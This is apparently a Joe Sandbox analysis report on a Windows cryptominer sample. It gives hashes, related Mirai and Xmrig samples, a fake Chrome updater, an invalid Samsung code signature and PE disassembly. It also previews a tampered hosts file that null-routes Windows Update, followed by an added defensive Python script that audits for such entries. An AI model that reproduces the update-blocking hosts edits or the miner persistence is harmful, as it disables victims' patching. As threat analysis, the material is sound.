ESPOL-ASPL | hbqK0qfLnv.elf | Get hash | malicious | Mirai | Browse | 83.168.127.254
ESPOL-ASPL | XBiCfJromk.elf | Get hash | malicious | Mirai | Browse | 83.168.87.139
ESPOL-ASPL | 5WJ15l9QBi.elf | Get hash | malicious | Mirai, Gafgyt | Browse | 83.168.87.158
ESPOL-ASPL | sora.arm.elf | Get hash | malicious | Mirai | Browse | 83.168.127.248
ESPOL-ASPL | mipsel-20230709-1219.elf | Get hash | malicious | Unknown | Browse | 83.168.87.114
                                    No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Windows\Temp\xptjtnajcbas.sys | OTm8DpW32j.exe | Get hash | malicious | Xmrig | Browse
C:\Windows\Temp\xptjtnajcbas.sys | zufmUwylvo.exe | Get hash | malicious | Flesh Stealer, Xmrig | Browse
C:\Windows\Temp\xptjtnajcbas.sys | zufmUwylvo.exe | Get hash | malicious | Xmrig | Browse
C:\Windows\Temp\xptjtnajcbas.sys | 0NSjUT34gS.exe | Get hash | malicious | Phorpiex, Xmrig | Browse
C:\Windows\Temp\xptjtnajcbas.sys | eshkere.bat | Get hash | malicious | Xmrig | Browse
C:\Windows\Temp\xptjtnajcbas.sys | frik.exe | Get hash | malicious | Xmrig | Browse
C:\Windows\Temp\xptjtnajcbas.sys | Google Chrome.exe | Get hash | malicious | Xmrig | Browse
C:\Windows\Temp\xptjtnajcbas.sys | e7WMhx18XN.exe | Get hash | malicious | SilentXMRMiner, Xmrig | Browse
C:\Windows\Temp\xptjtnajcbas.sys | GcqJPBLD2Q.exe | Get hash | malicious | BitCoin Miner, SilentXMRMiner, UACMe | Browse
C:\Windows\Temp\xptjtnajcbas.sys | C5Lg2JSPlD.exe | Get hash | malicious | SilentXMRMiner, Xmrig | Browse
                                                        Process:C:\Users\user\Desktop\egFMhHSlmf.exe
                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):5536856
                                                        Entropy (8bit):6.563142554876773
                                                        Encrypted:false
                                                        SSDEEP:98304:z0uVyIJFN+YjxW2q0pOFklpKRDArh51NuIQIi7by2ud3RK:QucIJbx9TOFkMOL1NuIQIi7by2uRRK
                                                        MD5:1417D38C40D85D1C4EB7FAD3444CA069
                                                        SHA1:27D8E2CA9537C80D1C1148830F9A6499F1E3E797
                                                        SHA-256:5F7C6CDEA3C4E825AF1D796CBD34B2D45B2B6FABED130E717A30A6D871993F5D
                                                        SHA-512:A169F8C5925977A984BC00A2B379205ED527777865215E4FFDFEB30084D1ED08F7BB5222DB8898161F1E6151D4A75E8CCC366543CF041E47EFFC21DCF4C351AB
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 74%
                                                        • Antivirus: Virustotal, Detection: 75%, Browse
                                                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."......f....R.....@..........@..............................U...........`.....................................................<.....T.......T......dT.X.....U.x...............................(.......8...............x............................text....d.......f.................. ..`.rdata...^.......`...j..............@..@.data...h.R.......R.................@....pdata........T......XT.............@..@.00cfg........T......ZT.............@..@.tls..........T......\T.............@....rsrc.........T......^T.............@..@.reloc..x.....U......bT.............@..B........................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):1.1940658735648508
                                                        Encrypted:false
                                                        SSDEEP:3:NlllulVmdtZ:NllUM
                                                        MD5:013016A37665E1E37F0A3576A8EC8324
                                                        SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                        SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                        SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                        Malicious:false
                                                        Preview:@...e................................................@..........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Preview:@...e...........................................................
                                                        Process:C:\Users\user\Desktop\egFMhHSlmf.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):3718
                                                        Entropy (8bit):4.256209152129098
                                                        Encrypted:false
                                                        SSDEEP:96:vDZEurK9TOx17pjxFoZ6MBJxBXliCWPRi4qnn54:RrK910
                                                        MD5:205365A533D1BD10A2AA09F064BCF995
                                                        SHA1:E89D17C50A9536CD3ED22E7E69799D99681EBF3B
                                                        SHA-256:A37B96845193EA17FD7D78F8E445A17A2A01755FFA9A9291F3085EF7483C5ABD
                                                        SHA-512:26C12D3422D733BBEA352BF07EE12FBC30153CBE3266B67005C24AC730746B818652CCF5850179BF3115BBEFAAED3FDB8713D6771F3925C79FFD418D5BF87C5A
                                                        Malicious:true
                                                        Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 download.windowsupdate.com..0.0.0.0 .microsoft.com..0.0.0.0 .update.microsoft.com..0.0.0.0 .windowsupdate.com..0.0.0.0 *.windowsupda
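The preview above shows the modified hosts file the sample writes: below the stock Microsoft header it appends entries that null-route download.windowsupdate.com and several Microsoft/Windows Update names to 0.0.0.0, a common way for a miner to keep the host from receiving updates or Defender signatures. Two practitioner points matter when triaging such a file. First, the hosts file matches exact hostnames only; it has no wildcard or suffix-rule syntax, so entries such as ".microsoft.com" or "*.windowsupdate.com" are accepted on disk but never match a real query, while "download.windowsupdate.com" is genuinely blocked. Second, a triage script should separate those two classes so the incident record states what was actually disabled. The audit below is an added example, not code from the Joe Sandbox report or from the sample; its sample hosts text is constructed from the preview (the wildcard line is constructed to show that case, since the preview is cut off there), and the watched-suffix list is an assumption chosen for illustration.

```python
"""Audit a Windows hosts file for update/security-domain sinkholing.

Added example; not code from the Joe Sandbox report or from the sample.
SAMPLE_HOSTS is constructed from the hosts-file preview in the dropped-files
section (the '*.' line is constructed; the preview is cut off there).
WATCHED_SUFFIXES is an assumption for illustration.
"""
from __future__ import annotations

import ipaddress
import re
from typing import NamedTuple

# Assumed watch list: domains whose null-routing usually means an implant is
# blocking OS updates or security-vendor telemetry.
WATCHED_SUFFIXES = ("microsoft.com", "windowsupdate.com")

# Constructed sample mirroring the report's preview of the modified hosts file.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost

0.0.0.0 download.windowsupdate.com
0.0.0.0 .microsoft.com
0.0.0.0 .update.microsoft.com
0.0.0.0 .windowsupdate.com
0.0.0.0 *.windowsupdate.com
"""

# One DNS label: 1-63 chars of alphanumerics/hyphen/underscore, no leading or
# trailing hyphen. An empty label (leading dot) or an asterisk never passes.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9_-]{1,63}(?<!-)$")


class Finding(NamedTuple):
    line_no: int
    address: str
    hostname: str
    effective: bool  # will the resolver actually match queries against it?
    reason: str


def parse_hosts(text: str) -> list[tuple[int, str, list[str]]]:
    """Return (line_no, address, hostnames) for every non-comment entry."""
    rows = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        body = raw.split("#", 1)[0].strip()  # drop comments, incl. fully commented lines
        fields = body.split()
        if len(fields) >= 2:  # an address plus at least one name
            rows.append((line_no, fields[0], fields[1:]))
    return rows


def is_sinkhole(address: str) -> bool:
    """True for 0.0.0.0, 127.x.x.x, :: and ::1, the addresses used to null-route a name."""
    try:
        ip = ipaddress.ip_address(address)
    except ValueError:
        return False
    return ip.is_unspecified or ip.is_loopback


def is_resolvable_name(name: str) -> bool:
    """The hosts file matches exact names only: no wildcards, no suffix rules."""
    return all(_LABEL.match(label) for label in name.rstrip(".").split("."))


def on_watch_list(name: str, suffixes=WATCHED_SUFFIXES) -> bool:
    name = name.lower()
    return any(name == s or name.endswith("." + s) for s in suffixes)


def audit_hosts(text: str, suffixes=WATCHED_SUFFIXES) -> list[Finding]:
    """Report sinkhole entries, separating ones the resolver honours from ones it ignores."""
    findings = []
    for line_no, address, names in parse_hosts(text):
        if not is_sinkhole(address):
            continue  # redirection to a live IP is a separate check, not done here
        for name in names:
            if not is_resolvable_name(name):
                findings.append(Finding(line_no, address, name, False,
                    "ignored by resolver: hosts file has no wildcard or suffix matching"))
            elif on_watch_list(name, suffixes):
                findings.append(Finding(line_no, address, name.lower(), True,
                    "update/security domain null-routed"))
    return findings


if __name__ == "__main__":
    for f in audit_hosts(SAMPLE_HOSTS):
        status = "BLOCKS" if f.effective else "no-op "
        print(f"line {f.line_no:>2} {status} {f.address:<9} {f.hostname:<28} {f.reason}")
```

Run against the constructed sample, only the download.windowsupdate.com entry is reported as effective; the four leading-dot and wildcard lines are reported as tampering that the resolver will ignore. On a live host, read C:\Windows\System32\drivers\etc\hosts and pass its contents to audit_hosts; extend WATCHED_SUFFIXES with the vendor domains your estate depends on.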
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\ProgramData\Google\Chrome\updater.exe
                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):14544
                                                        Entropy (8bit):6.2660301556221185
                                                        Encrypted:false
                                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        • Antivirus: Virustotal, Detection: 3%
                                                        Joe Sandbox View:
                                                        • Filename: OTm8DpW32j.exe, Detection: malicious
                                                        • Filename: zufmUwylvo.exe, Detection: malicious
                                                        • Filename: zufmUwylvo.exe, Detection: malicious
                                                        • Filename: 0NSjUT34gS.exe, Detection: malicious
                                                        • Filename: eshkere.bat, Detection: malicious
                                                        • Filename: frik.exe, Detection: malicious
                                                        • Filename: Google Chrome.exe, Detection: malicious
                                                        • Filename: e7WMhx18XN.exe, Detection: malicious
                                                        • Filename: GcqJPBLD2Q.exe, Detection: malicious
                                                        • Filename: C5Lg2JSPlD.exe, Detection: malicious
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                        Entropy (8bit):6.563142554876773
                                                        TrID:
                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                        • DOS Executable Generic (2002/1) 0.92%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:egFMhHSlmf.exe
                                                        File size:5'536'856 bytes
                                                        MD5:1417d38c40d85d1c4eb7fad3444ca069
                                                        SHA1:27d8e2ca9537c80d1c1148830f9a6499f1e3e797
                                                        SHA256:5f7c6cdea3c4e825af1d796cbd34b2d45b2b6fabed130e717a30a6d871993f5d
                                                        SHA512:a169f8c5925977a984bc00a2b379205ed527777865215e4ffdfeb30084d1ed08f7bb5222db8898161f1e6151d4a75e8ccc366543cf041e47effc21dcf4c351ab
                                                        SSDEEP:98304:z0uVyIJFN+YjxW2q0pOFklpKRDArh51NuIQIi7by2ud3RK:QucIJbx9TOFkMOL1NuIQIi7by2uRRK
                                                        TLSH:8346222438855716F769B0F9CAE194C5CB1D39B5AF0401AF8FB6D836F40AEC891F19CA
                                                        File Content Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."......f....R.....@..........@..............................U...........`........................................
                                                        Icon Hash:00928e8e8686b000
                                                        Entrypoint:0x140001140
                                                        Entrypoint Section:.text
                                                        Digitally signed:true
                                                        Imagebase:0x140000000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x66FFB086 [Fri Oct 4 09:08:22 2024 UTC]
                                                        TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                        CLR (.Net) Version:
                                                        OS Version Major:6
                                                        OS Version Minor:0
                                                        File Version Major:6
                                                        File Version Minor:0
                                                        Subsystem Version Major:6
                                                        Subsystem Version Minor:0
                                                        Import Hash:b237ac2118704db9e7609540658f5790
                                                        Signature Valid:false
                                                        Signature Issuer:CN=Symantec Class 3 Extended Validation Code Signing CA - G3, OU=Symantec Trust Network, O=Symantec Corporation, C=US
                                                        Signature Validation Error:The digital signature of the object did not verify
                                                        Error Number:-2146869232
                                                        Not Before:28/02/2019 19:00:00
                                                        Not After:28/02/2022 18:59:59
                                                        Subject Chain
                                                        • CN="Samsung Electronics CO., LTD.", O="Samsung Electronics CO., LTD.", L=Suwon-si, S=Gyeonggi-do, C=KR, SERIALNUMBER=130111-0006246, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.1=Suwon-si, OID.1.3.6.1.4.1.311.60.2.1.2=Gyeonggi-do, OID.1.3.6.1.4.1.311.60.2.1.3=KR
                                                        Version:3
                                                        Thumbprint MD5:BD27A85108500F98F2EFCFEDCA604C05
                                                        Thumbprint SHA-1:F0601C7ABE32E45183C7A63DA1B65EDB15B467C2
                                                        Thumbprint SHA-256:1EC5BB5496E64686460BE37E85F67172EDCF1C3A037CEBEF98671DC6CDAABD2D
                                                        Serial:7D7389F5AE537BB23B9C912C5F57D2F6
                                                        Instruction
                                                        dec eax
                                                        sub esp, 28h
                                                        dec eax
                                                        mov eax, dword ptr [00016ED5h]
                                                        mov dword ptr [eax], 00000001h
                                                        call 00007F385CB6A04Fh
                                                        nop
                                                        nop
                                                        nop
                                                        dec eax
                                                        add esp, 28h
                                                        ret
                                                        nop
                                                        inc ecx
                                                        push edi
                                                        inc ecx
                                                        push esi
                                                        push esi
                                                        push edi
                                                        push ebx
                                                        dec eax
                                                        sub esp, 20h
                                                        dec eax
                                                        mov eax, dword ptr [00000030h]
                                                        dec eax
                                                        mov edi, dword ptr [eax+08h]
                                                        dec eax
                                                        mov esi, dword ptr [00016EC9h]
                                                        xor eax, eax
                                                        dec eax
                                                        cmpxchg dword ptr [esi], edi
                                                        sete bl
                                                        je 00007F385CB6A070h
                                                        dec eax
                                                        cmp edi, eax
                                                        je 00007F385CB6A06Bh
                                                        dec esp
                                                        mov esi, dword ptr [0001C869h]
                                                        nop word ptr [eax+eax+00000000h]
                                                        mov ecx, 000003E8h
                                                        inc ecx
                                                        call esi
                                                        xor eax, eax
                                                        dec eax
                                                        cmpxchg dword ptr [esi], edi
                                                        sete bl
                                                        je 00007F385CB6A047h
                                                        dec eax
                                                        cmp edi, eax
                                                        jne 00007F385CB6A029h
                                                        dec eax
                                                        mov edi, dword ptr [00016E90h]
                                                        mov eax, dword ptr [edi]
                                                        cmp eax, 01h
                                                        jne 00007F385CB6A04Eh
                                                        mov ecx, 0000001Fh
                                                        call 00007F385CB80164h
                                                        jmp 00007F385CB6A069h
                                                        cmp dword ptr [edi], 00000000h
                                                        je 00007F385CB6A04Bh
                                                        mov byte ptr [00545AF1h], 00000001h
                                                        jmp 00007F385CB6A05Bh
                                                        mov dword ptr [edi], 00000001h
                                                        dec eax
                                                        mov ecx, dword ptr [00016E7Ah]
                                                        dec eax
                                                        mov edx, dword ptr [00016E7Bh]
                                                        call 00007F385CB8015Bh
                                                        mov eax, dword ptr [edi]
                                                        cmp eax, 01h
                                                        jne 00007F385CB6A05Bh
                                                        dec eax
                                                        mov ecx, dword ptr [00016E50h]
                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1d6f8 | 0x3c | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x54f000 | 0x3c8 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x54c000 | 0x198 | .pdata
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x546400 | 0x1858 | .data
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x550000 | 0x78 | .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x180a0 | 0x28 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x18410 | 0x138 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x1d8b0 | 0x178 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x1000 | 0x164b6 | 0x16600 | d03219d5f5ad4c7cfc70b9bc974b0664 | False | 0.44303203561452514 | data | 6.184866719712703 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata | 0x18000 | 0x5eec | 0x6000 | 2fedb5f261c9dbe65c25a99867a8d2d9 | False | 0.5303955078125 | data | 5.114107887686323 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data | 0x1e000 | 0x52d968 | 0x528e00 | fc80fcc82189b4d6496f3b54b94b924f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .pdata | 0x54c000 | 0x198 | 0x200 | fc487b8f37bf5b1308920cb5a80d51c4 | False | 0.52734375 | data | 3.6129282683966686 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .00cfg | 0x54d000 | 0x10 | 0x200 | b18c7380298e104adf73576fa46bccc1 | False | 0.04296875 | data | 0.15127132530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .tls | 0x54e000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc | 0x54f000 | 0x3c8 | 0x400 | 2c6a9469704cc65023e28ae6664ab248 | False | 0.3955078125 | data | 3.1182911646034395 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc | 0x550000 | 0x78 | 0x200 | 309655bc677064f03faa827151e8adf3 | False | 0.240234375 | data | 1.4943492802650686 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                        RT_VERSION | 0x54f060 | 0x368 | data | English | United States | 0.42545871559633025
                                                        DLL | Import
                                                        msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strcat, strcpy, strlen, strncmp, strstr, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                                        KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                                                        Language of compilation system | Country where language is spoken
